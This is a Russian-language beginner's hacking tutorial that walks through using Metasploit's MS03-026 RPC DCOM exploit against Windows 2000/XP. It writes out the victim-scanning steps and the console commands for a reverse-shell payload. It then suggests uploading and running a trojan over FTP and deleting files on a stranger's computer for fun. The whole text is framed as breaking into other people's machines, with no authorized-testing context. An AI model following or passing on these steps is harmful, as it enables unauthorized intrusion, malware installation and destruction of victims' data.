Эксплоиты Win NT/2K/XP/2K3 [ Хакерство для новичков ] Введение. Ты сканишь шары, воруешь пароли на инет. Это «хорошо», но надо идти дальше. Ты, наверное, слышал уже про эксплоиты, которые используют хакеры для взлома. Сейчас я расскажу тебе, как их использовать с помощью Metasploit Framework . Пристегнись. Работаем с эксплоитом. Metasploit Framework – это среда, предназначенная для разработки и тестирования эксплоитов. Как раз то, что нам нужно, качай последнюю версию с http://www.metasploit.com/ . Забыл сказать, что эксплоит – это программа или код, эксплуатирующая(ий) какую-либо уязвимость в программном продукте, короче что-то в этом роде. Metasploit (далее MFS ) выпускается, как для * nix платформ, так и для Win , распространяется бесплатно. Нам нужна версия под Windows . Установка проста, запускаем экзешник, жмем кнопку « Next ». Когда MFS установиться, запустится окно MFSConsole , не торопись его закрывать, подожди пока в нем не появиться консоль mfs >, после этого можешь нажимать « Finish ». Работать с консолью легко, главное привыкнуть и выучить несколько команд. Я расскажу, как это делать на примере использования одного эксплоита, потому что действия с другими эксплоитами аналогичны. И так, будем использовать известную дыру RPC DCOM в Win 2000 XP . Зная что дыра работает на 135 порту, найдем жертву. Для этого я использовал знаменитый сканер XSpider . Выбираем раздел «Поиск», вводим диапазон IP -адресов, указываем порт 135, жмем кнопку «Старт». IP -адреса помеченные крестиком – потенциальные жертвы. Теперь вернемся к MFS . Вводим команду show exploits , появиться список доступных эксплоитов (впечатляет правда?). Для нашей задачи нужен msrpc _ dcom _ ms 03_026. Печатай команду use msrpc _ dcom _ ms 03_026 , так мы переходим в среду эксплоита. Командой show options , получаем список опций, необходимых для успешной работы. Затем нужно ввести действие, которое должен сделать эксплоит. Делается это так, командой show PAYLOADS , смотрим список, затем задаем командой set PAYLOAD winreverse . Цели для которых используется эксплоит смотрим командой show TARGET , задается командой set TARGET 0 , но в данном случае указывать цель не надо, т.к. она одна. Порт атакуемого задается командой set RPORT 135 , также в данном случае нам не надо его указывать, т.к. он задан по умолчанию. Осталось ввести адрес жертвы, делается это командой set RHOST 172.19. XX . X , и командой set LHOST 172.34. XX . X задаем свой IP -адрес, который можно найти сделав двойной клик по двум мониторчикам в закладке «Сведения». Все, эксплоит готов. Запускается он командой exploit и если система у жертвы не пропатчена или не защищена, ты получишь доступ к командной строке удаленного компьютера, на экране должно высветится C : WINDOWS system 32>_ . Дальше фантазируй. Подскажу лишь, что можно поставить у себя не большой FTP -сервер и с помощью встроенного FTP -клиента, запущенного тобой на взломанной тачке, закачать Троян, и в последствии запустить его, тем самым получить полный доступ к системе. Ну как понравилось? Мощно! Прикинь, ты базаришь с каким-нибудь чуваком-ломаком по аське, смотришь его IP , подключаешься к нему и пишешь «А что там за фильм у тебя на диске D : под названием Video . avi , он же тебе не нужен? (следует команда D :> del Video . avi )». Представь удивленные глаза чувака-ломака, когда он не обнаружит этого фильма. На этом РЕСПЕКТ вам всем :::DIESEL:::